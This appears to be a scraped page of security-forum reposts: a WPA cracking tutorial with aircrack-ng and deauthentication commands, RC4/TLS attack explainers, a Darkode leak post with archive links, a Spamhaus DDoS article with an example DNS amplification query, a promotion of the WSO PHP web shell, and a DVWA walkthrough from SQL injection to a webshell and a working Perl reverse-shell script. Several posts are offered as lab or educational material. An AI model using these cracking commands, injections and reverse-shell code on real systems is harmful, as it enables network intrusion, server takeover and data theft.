  11. [h=3]How To Crack A WPA Key With Aircrack-ng[/h]With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows). Network Adapter I am going to use for WPA/WPA2 cracking is Alfa AWUS036H , OS# Backtrack 5R2 Step 1 : Setting up your network device To capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type: Command # iwconfig (to find all wireless network interfaces and their status) Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name) Step 2 : Reconnaissance This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target: Command # airodump-ng mon0 (Monitors all channels, listing available access points and associated clients within range. Step 3 : Capturing Packets To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data: Command # airodump-ng -c 1 bssid AP_MAC -w data mon0 Step 4 : De-Authentication Technique To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using: Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client. So, now we have successfully acquired a WPA Handshake. Step 5 : Cracking WPA/WAP2 Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases. Command # aircrack-ng -w wordlist ‘capture_file’.cap (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake) Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files. Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack. About The Author Shaharyar Shafiq is doing Bachelors in Computer Engineering from Hamdard University. He has done C|PTE (Certified Penetration Testing Engineering) and he is interested in network Penetration Testing and Forensics. Sursa: How To Crack A WPA Key With Aircrack-ng | Learn How To Hack - Ethical Hacking and security tips
  12. HTTPS Cracked! SSL/TLS Attacked And Exploited People who blog about ethical hacking have a very sincere relationship with Cryptographers. They (the Cryptographers) keep bringing in something delightful into the everyday nonsense and we blabber about their accomplishments until its squishy and old - this love goes far beyond then can be comprehended by normal folk. No offence. It seems like they have swept us off our feet again and this time around, they are flaunting the big guns. Cryptographers have targeted SSL/TLS and done some serious damage to HTTPS. Transport Layer Security didn't face a major blow during the attack as it requires to capture millions and billions of connections consisting of the same plaintext. But this highlights a major issue present in using the RC4 encryption algorithm. RC4 uses the same key for encryption and decryption, whereas TLS uses a public/private key pair for encryption and decryption which makes it lag therefore it uses a hybrid approach. TLS connection can be setup using public/private key pairs and once established can share encrypted data over a secure network that uses ciphers for encrypting data such as AES, DES, Triple-DES, Blowfish, RC4, etc. RC4 has been advised against many times in the past but its also a fact that it brings in half of all TLS traffic. So, the attack was done on a part of TLS by AlFardan-Bernstein-Paterson-Poettering-Schuldt (AIFBPPS). According to NakedSophos team; [INDENT] [FONT=inherit]RC4 is a [I]stream cipher[/I], so it is basically a keyed cryptographic pseudo-random number generator (PRNG). It emits a stream of cipher bytes that are XORed with your plaintext to produce the encrypted ciphertext.[/FONT] [FONT=inherit]To decrypt the ciphertext, you initialise RC4 with the same key, and XOR the ciphertext with the same stream of cipher bytes. XORing twice with the same value "cancels out", because k XOR k = 0, and because p XOR 0 = p.[/FONT] [/INDENT] RC4 generates a statistically anomalous output initially in each stream of cipher bytes. Therefore it is not a high-quality cryptographic PRNG. This phenomenon was first observed by Itsik Mantin and Adi Shamir in 2001. They noticed that during the second output byte the value zero turned up twice as often as it should; 256 keys on average to be precise with a probability of 1/128. This resulted in WEP being attacked which was then replaced by WPA. AIFBPPS have taken this attack further than anyone else "producing statistical tables for the probability of every output byte (0.255) for each of the first 256 output positions in an RC4 cipher stream, for a total of 65535 (256x256) measurements." According to NakedSophos team; [INDENT] [FONT=inherit]By using a sufficiently large sample size of differently-keyed RC4 streams, they achieved results with sufficient precision to determine that almost every possible output was biased in some way. The probability tables for a few of the output positions (which are numbered from 1 to 256) are show below. The authors realised that if you could produce TLS connections over and over again that contained the the same data at a known offset inside the first 256 bytes (for example an HTTP request with a session cookie at the start of the headers), you could use their probability tables to guess the cipher stream bytes for those offsets.[/FONT] [/INDENT] Here's a brief description of how it works by NakedSophos team: "Imagine that you know that the 48th plaintext byte, P48, is always the same, but not what it is. You provoke millions of TLS connections containing that fixed-but-unknown P48; in each connection, which will be using a randomly-chosen session key, P48 will end up encrypted with a pseudo-random cipher byte, K48, to give a pseudo-random ciphertext byte, C48. And you sniff the network traffic so you capture millions of different samples of C48. Now imagine that one value for C48 shows up more than 1% (1.01 times) more frequently than it ought to. We'll refer to this skewed value of C48 as C'. From the probability table for K48 above, you would guess that the cipher byte used for encrypting P to produce C' must have been 208 (0xD0), since K48 takes the value 208 more than 1% too often. In other words, C' must be P XOR 208, so that P must be C' XOR 208, and you have recovered the 48th byte of plaintext. The guesswork gets a little harder for cipher stream offsets where the skew in frequency distribution is less significant, but it's still possible, given sufficiently many captured TLS sessions. AlFBPPS measured how accurate their plaintext guesses were for varying numbers of TLS sessions, and the results were worrying, if not actually scary: "However, given the huge number of TLS sessions required, The Register's provocative URL theregister.co.uk/tls_broken might be going a bit far. Initiating 232 (4 billion), or even 228 (260 million), TLS sessions, and then sniffing and post-processing the results to extract a session cookie is unlikely to be a practicable attack any time soon. If nothing else, the validity of the session cookie might reasonably be expected to be shorter than the time taken to provoke hundreds of millions of redundant TLS connections. On the other hand, the advice to avoid RC4 altogether because of its not-so-random PRNG can't be written off as needlessly conservative. If you can, ditch RC4 from the set of symmetric ciphers your web browser is willing to use, and your web servers to accept. Go for AES-GCM instead. GCM, or Galois/Counter Mode, is a comparatively new way of using block ciphers that gives you encryption and authentication all in one, which not only avoids the risky RC4 cipher, but neatly bypasses the problems exposed in the Lucky 13 attack, too." Cheers! About the Author: This Article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team. Sursa: HTTPS Cracked! SSL/TLS Attacked And Exploited | Learn How To Hack - Ethical Hacking and security tips
  13. [h=3]New RC4 Attack[/h] This is a really clever attack on the RC4 encryption algorithm as used in TLS. We have found a new attack against TLS that allows an attacker to recover a limited amount of plaintext from a TLS connection when RC4 encryption is used. The attacks arise from statistical flaws in the keystream generated by the RC4 algorithm which become apparent in TLS ciphertexts when the same plaintext is repeatedly encrypted at a fixed location across many TLS sessions. The attack is very specialized: The attack is a multi-session attack, which means that we require a target plaintext to be repeatedly sent in the same position in the plaintext stream in multiple TLS sessions. The attack currently only targets the first 256 bytes of the plaintext stream in sessions. Since the first 36 bytes of plaintext are formed from an unpredictable Finished message when SHA-1 is the selected hashing algorithm in the TLS Record Protocol, these first 36 bytes cannot be recovered. This means that the attack can recover 220 bytes of TLS-encrypted plaintext. The number of sessions needed to reliably recover these plaintext bytes is around 230, but already with only 224 sessions, certain bytes can be recovered reliably. Is this a big deal? Yes and no. The attack requires the identical plaintext to be repeatedly encrypted. Normally, this would make for an impractical attack in the real world, but http messages often have stylized headers that are identical across a conversation -- for example, cookies. On the other hand, those are the only bits that can be decrypted. Currently, this attack is pretty raw and unoptimized -- so it's likely to become faster and better. There's no reason to panic here. But let's start to move away from RC4 to something like AES. There are lots of press articles on the attack. Sursa: Schneier on Security: New RC4 Attack
  14. [h=3]Darkode leak[/h] And you can thanks Nassef. Internal Revenue Service I don't know if it's you who did this shit upaskitv1.org xylibox.biz krebsonsecurity.biz upaskitversion1.biz stevenk.biz briankrebs.biz upaskit1.biz researchsecurity.biz securityresearch.biz amatrosov.biz But seems you are related to this so i gave a fuck. Also i can thank you for this: Got your Builder from Darkode and made my keygen. I also grabbed alot of other things but it's another story. Nassef is also involved into POS sniffing. Trying to deal with carder shops: But i will not talk of Nassef here, but of 'darkode' This forum is know to be a 'elite' community of black hats, there is alot of (in)famous actors inside. Some are already jailled and some are still on business. Darkode login with a really gay captcha. And about the captcha they added it due to me: I don't live in Lyon and i never walked with you, get a life man. About the captcha something worry me: Seem he sniff passwords, i'm sure the login form is even backdoored to know passwords of his users. Also this is not my bruteforce, when i bruteforce it's more hardcore than this shit. Darkode, on a short period even asked a private SSL cert to avoid unauthorized people: They removed it for an unknown reason, (probably due to the skid wave end), admin of DK gived invite to everyone recently (i even received one without doing nothing, i'm not sure if it's black hat humor or if someone posed on dk and gived my mail) Anyway i don't need this invitation. Now, let's have a look on who's inside darkode... symlink: Paunch: *******: bx1: BestAV: Severa: Exmanoize: alexudakov: Carberp J.P.MORGAN Even Slavik according to admin: Some members listed here are already jailed, e.g: bx1, *******. A member who show off his money done with SpyEye ($11,404,34 USD): Another DK member who have launder 20k LR with members of this forum: Sweet orange stats of a guys: Coder of crimepack angry for the leak: Presentation of cr33k, coder of “Open Source Exploit Kit” "I skimmed Diebolds", "as a mule i cashed out WU payments with fake IDs" There is some nice people on darkode... Presentation of Egypack exploit kit: Business advice from a darkode admin: Now about darkode you will says "wow, this board is hardcore" but no... not really Maybe this forum was cool in 2009 with Gribodemon and shit's but actually it's look like hackforums. And about hackforums even admins are on it: mafi (www.hackforums.net/member.php?action=profile&uid=82912) Selling crimepack: sp3cial1st (hackforums.net/member.php?action=profile&uid=666599) Recruiting hackforums people for darkode: Fubar (hackforums.net/member.php?action=profile&uid=83826) HF Leet: (and they are all admins on darkode) profile of mafi on malwareview (a kernelmode.info like but with idiots): oh wow they use even hackforums products and resell them. ngrbot, is this the scene ? Also remember this ? Maybe in another post i will explain the dramascene between uNkn0wn and darkode... At darkode they will probably calls 2,3 screenshots a 'leak' so... i took around ~4500 screenshots: I know it can be hard for white hat to enter on community like darkode for do researchs. So enjoy 763 Mb of screenshots, not a full dump but almost a full dump. I have a full dump of course with each threads, pages fetched via wget but i keep this version for law enforcement guys (and some have already the darkode account and my regulars dump in hands since a long time, just saying..) Anyway even with this 'public' screenshots dump anyone have enough to launch indictments and shit. Oh.. it's really fun dude. Also took a screenshot of maza for the glory... (I must admit i miss malwares of 2010/2011) Gribo talk that Slavik is completely left from bussiness and he transfered everything related to Zeus 2.0 to Gribo, so he can continue work on this bot, including customers technical support. Slavik said to tell that he was happy to work with all the guys and other shit. You can download the public dump here: http://temari.fr/darkode.rar http://trollkore.fr/darkode.rar http://yandere.fr/darkode.rar After 24 hours i will remove the archive from my server so fetch it fast. Multiupload.nl - upload your files to multiple file hosting sites! To conclude: This post about darkode is exceptional i usualy leave these forums alone and don't blog about it. I receive a lots of emails requesting me to give a fuck about theses boards, but since some days for an unknown reason some guys of darkode started to seriously annoy me (adding me on skype and mailling me with shits), this is just my response to them. cb0f0ef62585ef7484d3582f3caf4ccf Have a nice day and good advice: stay away of darkode if you don't want someone to knock at your door Also don't ask me to do the same type of post about mazafaka, or other forums (i see already mails coming) If you want some infs http://trojanforge.com/showthread.php?t=2391 is a good start, i will not help. Posted by Steven K at 01:22 Sursa: XyliBox: Darkode leak
  15. [h=1]How the Spamhaus DDoS attack could have been prevented[/h]Internet engineers have known for at least 13 years how to stop major distributed denial of service attacks. But thanks to a combination of economics and inertia, attacks continue. Here's why. by Declan McCullagh March 29, 2013 4:00 AM PDT Nearly 13 years ago, the wizardly band of engineers who invented and continue to defend the Internet published a prescient document they called BCP38, which described ways to thwart the most common forms of distributed denial-of-service attack. BCP38, short for Best Current Practice #38, was published soon after debilitating denial of service attacks crippled eBay, Amazon, Yahoo, and other major sites in February 2000. If those guidelines to stop malcontents from forging Internet addresses had been widely adopted by the companies, universities, and government agencies that operate the modern Internet, this week's electronic onslaught targeting Spamhaus would have been prevented. But they weren't. So a 300-gigabit-per-second torrent of traffic flooded into the networks of companies including Spamhaus, Cloudflare, and key Internet switching stations in Amsterdam, Frankfurt, and London. It was like 1,000 cars trying to crowd onto a highway designed for 100 vehicles at a time. Cloudflare dubbed it, perhaps a bit too dramatically, the attack "that almost broke the Internet." BCP38 outlined how providers can detect and then ignore the kind of forged Internet addresses that were used in this week's DDoS attack. Since its publication, though, adoption has been haphazard. Hardware generally needs to be upgraded. Employees and customers need to be trained. Routers definitely need to be reconfigured. The cost for most providers, in other words, has exceeded the benefits. "There's an asymmetric cost-benefit here," said Paul Vixie, an engineer and Internet pioneer who serves on the Internet Corporation for Assigned Names and Numbers' security advisory board. That's because, Vixie said, the provider that takes the time to secure its networks makes all the investment, while other providers "get all the reward." BCP38 is designed to verify that someone claiming to be located in a certain corner of the Internet actually is there. It's a little like a rule that the Postal Service might impose if there's a deluge of junk mail with fake return addresses originating from a particular ZIP code. If you're sending a letter from San Francisco, the new rule might say, your return label needs to sport a valid northern California address, not one falsely purporting to originate in Hong Kong or Paris. It might annoy the occasional tourist, but it would probably work in most cases. This week's anti-Spamhaus onslaught relied on attackers spoofing Internet addresses, then exploiting a feature of the domain name system (DNS) called open recursors or open recursive resolvers. Because of a quirk in the design of one of the Internet's workhorse protocols, these can amplify traffic over 30 times and overwhelm all but the best-defended targets. The countermeasures Preventing spoofing through BCP38 will prevent this type of amplification attack. "There is no way to exploit DNS servers of any type, including open recursors, to attack any third party without the ability to spoof traffic," said Arbor Networks' Roland Dobbins. "The ability to spoof traffic is what makes the attack possible. Take away the ability to spoof traffic, and DNS servers may no longer be abused to send floods of traffic to DDoS third parties." Other countermeasures exist. One of them is to lock down open recursive resolvers by allowing them to be used only by authorized users. There are about 27 million DNS resolvers on the global Internet. Of those, a full 25 million "pose a significant threat" and need to be reconfigured, according to a survey conducted by the Open Resolver Project. Reprogramming them all is the very definition of a non-trivial task. "You could stop this attack in either of two ways," said Matthew Prince, co-founder and CEO of CloudFlare, which helped defend against this week's attack. "One, shut down the open resolvers, or two, get all the networks to implement BCP38. The attackers need both in order to generate this volume of attack traffic." Alternatively, networks don't need to lock down open resolvers completely. Google, which operates one of the world's largest networks, has adopted an innovative rate-limiting technique. It describes rate-limiting as a way to "protect any other systems against amplification and traditional distributed DoS (botnet) attacks that could be launched from our resolver servers." But few companies, universities, individuals, and assorted network operators are going to be as security-conscious as Mountain View's teams of very savvy engineers. Worse yet, even if open recursive resolvers are closed to the public, attackers can switch to other services that rely on UDP, the Internet's User Datagram Protocol. Network management protocols and time-synchronization protocols -- all designed for a simpler, more innocent era -- can also be pressed into service as destructive traffic reflectors. The reflection ratios may not be as high as 1:30, but they're still enough to interest someone with malicious intent. Arbor Networks has spotted attacks based on traffic amplification from SNMP, a network management protocol, that exceed 30 gigabits per second. Closing open DNS resolvers won't affect attacks that use SNMP to club unwitting targets. Which is, perhaps, the best argument for BCP38. The most common way to curb spoofing under BCP38 is with a technique called Unicast Reverse Path Forwarding (uRPF) to try to weed out unwanted traffic. But that needs to be extended to nearly every customer of a provider or network operator, a daunting undertaking. Nick Hilliard, chief technology officer for INEX, an Internet exchange based in Dublin, Ireland, said: BCP38 is harder than it looks because in order to implement it properly, you need to roll out uRPF or interface [access control lists] to every single customer edge point on the internet. I.e. every DSL link, every cable modem, every VPS in a provider's cloud hosting centre and so forth. The scale of this undertaking is huge: there is lots of older (and sometimes new) equipment in production out there which either doesn't support uRPF (in which case you can usually write access filters to compensate), or which supports uRPF but badly (i.e. the kit might support it for IPv4 but not IPv6). If you're a network operator and you can't use uRPF because your kit won't support it, installing and maintaining individual access filtering on your customer edge is impossible without good automated tools to do so, and many service providers don't have these. Translation: It all adds up to being really hard. Vixie, who wrote an easy-to-read description of the problem back in 2002, suggested it's a little like fire, building, and safety codes: the government "usually takes a role" forcing everyone to adopt the same standards, and roughly the same costs. Eventually, he suggests, nobody complains that their competitors are getting away without paying compliance costs. That argument crops up frequently enough in technical circles, but it tends to be shot down just as fast. For one thing, wielding a botnet to carry out a DDoS attack is already illegal in the United States and just about everywhere else in the civilized world. And as a practical matter, botnet-managing criminals can change their tactics faster than a phalanx of professional bureaucrats in Washington, D.C. or other national capitals can respond. INEX's Hilliard said the real answer is to change the economics to make it less profitable to carry out DDoS attacks. When sending spam was cheap, Hilliard said, he was receiving 10,000 Viagra offers a month. But after network providers took concerted steps to crack down, "the economics changed and so did the people who were abusing the Internet, and now I get about 2,000 a month, all of which end up in my spam folder," he said. "The same thing will happen to DDoS attacks: in 10 years' time, we will have a lot more in terms of BCP38 coverage, and we won't get upset as much about the small but steady stream of 300-gigabit attacks." Sursa: How the Spamhaus DDoS attack could have been prevented | Security & Privacy - CNET News
  16. Parsing Binary File Formats With PowerShell Authored by Matt Graeber | Site exploit-monday.com This archive includes a presentation and code samples. The presentation is called Parsing Binary File Formats with PowerShell. Download: http://packetstormsecurity.com/files/121014/powershell-parsingbinary.tgz
  17. MiniDuke - The Final Cut Bitdefender Labs analysts have taken the time to put together an in-depth look at MiniDuke, detailing everything they’ve found (so far). The new research paper covers subjects ranging from the functionality of the payload dropper, to the content of the hand-crafted phishing e-mails. It’s fresh, it’s got surprising hints as to the attackers’ identities and it’s hosted here: Download: http://labs.bitdefender.com/wp-content/uploads/downloads/2013/04/MiniDuke_Paper_Final.pdf Sursa: MiniDuke – The Final Cut | Bitdefender Labs
  18. CUDA Cracking PRESENTED BY: ROHIT SHAW XIARCH SOLUTIONS PVT LTD NEW DELHI Compute Unified Device Architecture (CUDA) is a parallel computing architecture developed by Nvidia for graphics processing. CUDA is the computing engine in Nvidia graphics processing units (GPUs) that is accessible to software developers through variants of industry standard programming languages. Introduction: Cuda cracking means cracking passwords with the help of Graphics card which have GPU, it means the speed of password cracking is much faster than CPU speed. Building a CUDA Machine: For building a monster cuda machine we have to invest a huge amount on it. First we have to select a motherboard which supports more than one GPU because the more GPU means the process of password cracking is much faster. I suggest MSI Big Bang Marshall Motherboard which supports multiple GPUs up to 8 graphic cards. Another unique feature of this motherboard that it is cross platform GPU supportable it means it can support both ATI and Nvidia graphic cards at a time. Use Quad core processors or Intel’s I family processors for better performance. RAM up to 16 GB is efficient for this motherboard. Another important thing to keep in mind that is the power supply system we have to supply up to 1250 watt power to this machine. Also use cooling fans as much as possible because during process graphic cards heats very intensively. Download: www.exploit-db.com/download_pdf/24909
  19. Nytro

    Fun stuff

    Infosec Reactions via d.
  20. Info: https://rstforums.com/blog/2013/03/30/c-quest-3/
  21. A doua pereche iti ajuta incheietura sa nu ti se buseasca in special cand faci piept sau triceps cu haltera, intins pe spate si cu priza scurta.
  22. Known as DNS reflection, the technique uses requests for a relatively large zone file that appear to be sent from the intended victim's network. According to CloudFlare, it initially recorded over 30,000 DNS resolvers that were tricked into participating in the attack. There are as many as 25 million of these open recursive resolvers at the disposal of attackers "In the Spamhaus case, the attacker was sending requests for the DNS zone file for ripe.net to open DNS resolvers. The attacker spoofed the CloudFlare IPs we'd issued for Spamhaus as the source in their DNS requests. The open resolvers responded with DNS zone file, generating collectively approximately 75Gbps of attack traffic. The requests were likely approximately 36 bytes long (e.g. dig ANY ripe.net @X.X.X.X +edns=0 +bufsize=4096, where X.X.X.X is replaced with the IP address of an open DNS resolver) and the response was approximately 3,000 bytes, translating to a 100x amplification factor."
  23. Omg, ce-ai facut? Ai crapat serverul RST...
  24. [h=2]WSO 2.5.1 [Ethical Shell ][/h]WSO is a PHP shell backdoor that provide an interface for various remote operations. It can perform everything from remote code execution, bruteforcing of servers, provide server information, and more. Download (packetstorm) Link : http://packetstormsecurity.org/files/117974/WSO-Web-Shell-2.5.1.html Features: Authorization for the cookies Server Information File manager (copy, rename, move, delete, chmod, touch, create files and folders) View, hexview, editing, downloading, uploading files Working with zip archives (packing, unpacking) + compression tar.gz Console SQL Manager (MySql, PostgreSql) Execute PHP code Working with Strings + hash search online databases Bindport and back-Connect (Perl) Bruteforce FTP, MySQL, PgSQL Search files, search text in files Support for * nix-like and Windows systems Antipoiskovik (check User-Agent, if a search engine then returns 404 error) You can use AJAX Small size. Packaged version is 22.8 Kb The choice of encoding, which employs a shell. Changelog (v2.5.1): Remove comments from the first line . Added option to dump certain columns of tables. the size of large files are now well defined . in the file properties field "Create time" changed to "Change time" (PHP: filectime - Manual). Fixed a bug that caused not working mysql brute force if there was a port of the server . Fixed a bug due to which one can not see the contents of a table called download in the database. Youtube link : https://www.youtube.com/watch?v=MreAwLEXK_E Sursa: WSO 2.5.1 [Ethical Shell ]
  25. [h=1]Anatomy of an attack: Gaining Reverse Shell from SQL injection[/h]Shashank March 28, 2013 SQL injection opens a lot of possibilties for an attacker like dumping the database, causing denial of service, or stealing sensitive information. But it becomes more interesting when it can be used to compromise a server. Different SQL databases, like MSSQL, MySQL, ORACLE, PLSQL pose different sets of challenges for the attacker once the injection is detected. I have taken MySQLas a database for demonstrating anatomy of the sql injection attack. This post talks about simple techniques to exploit SQL injection (SQLi) and gain a reverse shell. For the SQLi attack there are few basic steps : Identify:The SQL injection point. Take:MySQL help to explore the SQL injection further. Exploit:Upload the webshell and get the reverse connection. For the demo I am using Damn Vulnerable Web Application (DVWA). It is easy to install and can be downloaded from http://www.dvwa.co.uk/. DVWA is PHPMySQLApache application and purposefully made vulnerable. It is a good tool for web application security enthusiasts to begin with. I will be using two scenarios where DVWA is installed on Linux OS and another in Windows OS. The concept behind the attack is the same in both the scenarios but there is a slight difference in exploitation that we will discuss later. It is easy to install and configure DVWA and for the demo I have kept the script security as “low”. Identify:The SQL injection point. Identifying the SQL injection is the key step, and it takes a lot of skill and experience to identify the injection point. By analyzing the application properly,the possible injection points can be identified. Like in the screenshot shown below, the USER ID field could be vulnerable to SQL injection. It takes an integer as input and displays the First Name and Surname associated with the User ID provided. Let us put a quote (‘) in the UserID. We can see that the database error is generated which confirms that the application is vomiting database errors; also, the database in use is MySQL. If you will see the error closely it is a syntax error. The reason is the backend SQL query causes a syntax error when supplied a (‘) instead of integer. If I try to imagine the query at the backend it would be something like: MySQL> select first_name, last_name from users where user_id=’ ‘ ; If provided input is the quote (‘) the SQL query breaks and becomes: MySQL> select first_name, last_name from users where user_id=’ ” ; And hence, it creates a syntax error. So, the injection point is identified as the USERID field and it is possible to communicate to the backend SQL server from the front end which will make the SQL injection possible. Take:MySQL helps to explore the SQL injection further. Let’s dig further and try to enumerate to try to guess the backend query, number of columns used in the query, database name, MySQL version etc. Our guess about the backend query from the front end is something like: MySQL> select first_name, last_name from users where user_id=1 ; But it is just a wild guess. We’ll need proper enumeration of the backend query for which MySQL helps us. MySQL gives us ORDER BY. Now why are we using ORDER BY ? ORDER BY sorts the results according the the columns. Like the query above uses 2 columns, using ORDER BY the result can be sorted according to column 1 (first_name) or according to column 2(last _name). So query will execute only when it will be sorted according to the columns used in the query. But If I want to sort the results by column 3 (which is not used in the query) MySQL will generate the error saying: ERROR 1054 (42S22): Unknown column ’3? in ‘order clause’ So the deduction would be when I used ORDER BY with 2 I didn’t get any error but when I used with 3 I got the above error, so the number of columns used in the backend query is 2. In this way, our work to guess number of columns become easy with ORDER BY. Let’s try it here. Using id= ‘ order by 3 # application throws the MySQL error and tells that the 3rd column is not used in the query. The (#) used here is to comment out the rest of the backend query. So it will be like: MySQL> select first_name, last_name from users where user_id=’ ‘ order by 3 # ‘ ; And using id= ‘ order by 2 # no error is generated hence confirms that the number of columns used in the backend query is 2. Now to enumerate further let us use the UNION Query. Why are we using UNION? UNION combines the results of 2 SELECT queries. From our previous ORDER BY operation we know that the query contains 2 columns. So one SELECT query is the backend query on which we have no control but we can introduce UNION with another SELECT query designed by us and will display the result which will be union of the results of 2 queries. The final query at the backend would be something like this after our injection using UNION SELECT. Make sure since the columns used in the main query is 2, in UNION SELECT we should use 2 columns only since both SELECT queries should have same number of columns: MySQL> select first_name, last_name from users where user_id=’ ‘ union select 1,2 ; By using the UNION query, we can see that results are getting displayed on the page which is the UNION of the backend SELECT query in use and our inserted SELECT query. Since we can design our SELECT query, it allows us to enumerate well. So we will keep the other injection as: ‘ UNION SELECT user(), database()# It will display the results as user and database in use. Playing further with it using session_user() and current_user(): Also, we can know the version of the MySQL in use. And to beautify it more, MySQLprovides us load_file() function using which we can read files, let’s read /etc/passwdby injecting: ‘ UNION SELECT 1, load_file(/etc/passwd) # Now it is time for exploitation using UNION SELECT. Exploit:Upload the webshell and get the reverse connection. Here comes the exploitation part. Till now we were focused on the reading and enumerating. The plan is to upload a webshell in the webroot. To confirm the webroot we browsed to PHPinfo.php file which contains lot of information about the webserver including the webroot. We confirmed that the /var/www/ is the webroot which is default location of the Apache server. Identifying the correct webroot is very important. For Apache we already know the default webroot but sysadmins might change the default path. In this application, we have this luxury of looking into PHPinfo.php, but this might not be the case all the time. One of the methods is by looking into errors generated by the application. It might reveal the installation path. So an aware developer can make this step difficult for an attacker by hiding the webroot info. Now we will use the UNION SELECT to create a PHP file in the webroot using INTO OUTFILE. INTO OUTFILE writes the selected rows to a file. The injection below shows that the cmd.php file will be formed in the webroot which will execute OS commands for us. So injecting: ‘ union select 1,’‘ INTO OUTFILE ‘/var/www/dvwa/cmd.php’ # Those who know PHP they can easily makeout that we are inserting a PHP script‘‘ which will run system commands by taking argument via GET and this script would be written to a PHP file (cmd.php) located in the webroot directory. This method will work when you have permission to write in the webroot. An aware system admin might change the permissions of the of the installation folder which will make this attack impossible. As we can see the injection is successful and as we can browse cmd.php uploaded in the webroot. Let us run some operating system commands. As we see, using the id command, we have privilege of Apache user. We can run couple of other commands and play around. But in order to escalate the privileges we will need the interactive shell. So it is required to gain a reverse connection. Let us check where Perl is installed in the system or not by running Perl –h. Now let’s download and save the Perl backconnect from attackers system and save it in /tmp using the wget command. The perl backconnect which I am using is very simple script which takes IP and port as arguments. /tmp give us writable permission and that is the reason why are we saving it in /tmp. Perl backconnect Script: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 [/TD] [TD=class: code]#!/usr/bin/perl use Socket; use FileHandle; $IP = $ARGV[0]; $PORT = $ARGV[1]; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')); connect(SOCKET, sockaddr_in($PORT,inet_aton($IP))); SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); system("/bin/sh -i"); [/TD] [/TR] [/TABLE] Let us check whether the command is successful or not. And yes, backconnect.plis present there in /tmp. Now we will launch netcat at port 8000 and wait for the connection. Also, try running the perl backconnect script.Yes, we got the reverse connection. And we have an interactive shell for use. This shell can be used to launch local privilege escalation exploits to give the attacker root privileges on the server. Now let’s replicate the same steps in windows. For the demo purpose I have installed DVWA in WAMP server in windows. First, try UNION SELECTalong withload_file() in windows. We want to read a file located in E drive in windows. The path of the file is: e:/testfile.txt The injection would be ‘ union select 1, load_file(‘e:\\testfile.txt’) # It is important to specify the path of the file in proper way and as we can see the path is mentioned as e:\\testfile.txt because MySQL will read (\\)as a backlash character (“\”) since (\) is an escape character. The injection can also be like: ‘ union select 1, load_file(‘e:\/testfile.txt’) # Now to upload the webshell and find the webroot of the application installed in windows. It is mentioned in PHPinfo.phpfile. The webroot is confirmed as c:/wamp/www/DVWA/dvwa/. The injection for uploading the webshell would be: ‘ union select 1, ‘‘ INTO OUTFILE ‘c:\\wamp\\www\\DVWA\\dvwa\\cmd.php’# There is no error generated. It seems the injection is successful.Let’s check cmd.php. And yes, it is working perfectly fine. We can run different commands and play around with the webshell. Like whoami tell us that we are having NTauthority\system privileges. This is how an SQL injection can be deadly. It shows that a big responsibility lies on the shoulders of the developers of the application and the system/database admins. A single mistake can compromise the application and server as well. Sursa: http://resources.infosecinstitute.com/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/
×
×
  • Create New...